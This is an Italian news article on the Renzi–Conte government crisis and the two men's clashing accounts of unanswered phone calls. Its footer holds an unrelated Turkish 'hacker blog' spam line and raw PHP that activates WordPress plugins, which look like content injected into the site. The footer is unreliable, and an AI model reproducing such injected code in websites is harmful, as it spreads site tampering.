Crisi governo, il retroscena delle telefonate. Renzi: “Da Conte neanche una chiamata”. La replica: “E’ lui che non ha risposto”



Ormai separati dopo l’annuncio di Renzi di ritirare dal governo la delegazione di Italia Viva, adesso danno versioni contrastanti sulla genesi della crisi di governo.

L’ex rottamatore dice che il premier nulla ha fatto per scongiurare la crisi, chiamandolo. Conte fa sapere che è l’opposto: è Renzi che non ha risposto. Il leader di Iv ha spiegato ai parlamentari che si è trattata di una strada segnata, che non poteva essere preso sul serio ‘il segnale’ del premier Conte: una dichiarazione in mezzo alla strada a mezz’ora dalla conferenza stampa. Aveva mille modi, avrebbe detto Renzi, per tentare un accordo: avrebbe potuto chiamare, chiedere un incontro, chiedere 24 ore di tempo e di rinviare la conferenza stampa. Niente di tutto questo. Quindi Renzi ha spiegato ai parlamentari che non ci sarebbero stati margini per evitare un “passaggio ormai ineludibile” vista l’assenza di risposte alle questioni di metodo e di merito poste da tempo da Italia Viva. “Senza le dimissioni delle ministre -avrebbe detto Renzi – non si sarebbe aperta la discussione interna alla maggioranza”. Eppure da palazzo Chigi escono voci di un Conte tentato dalla via dell’aula. La risposta dei renziani è laconica: “Se ha deciso così, lo aspettiamo”.

L’agenzia Adnkronos batte la notizia di chiamate e messaggi ma nessuna risposta. Il premier Giuseppe Conte, riportano fonti parlamentari, nei giorni scorsi avrebbe cercato al telefono Matteo Renzi, ma non avrebbe mai ricevuto risposta.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );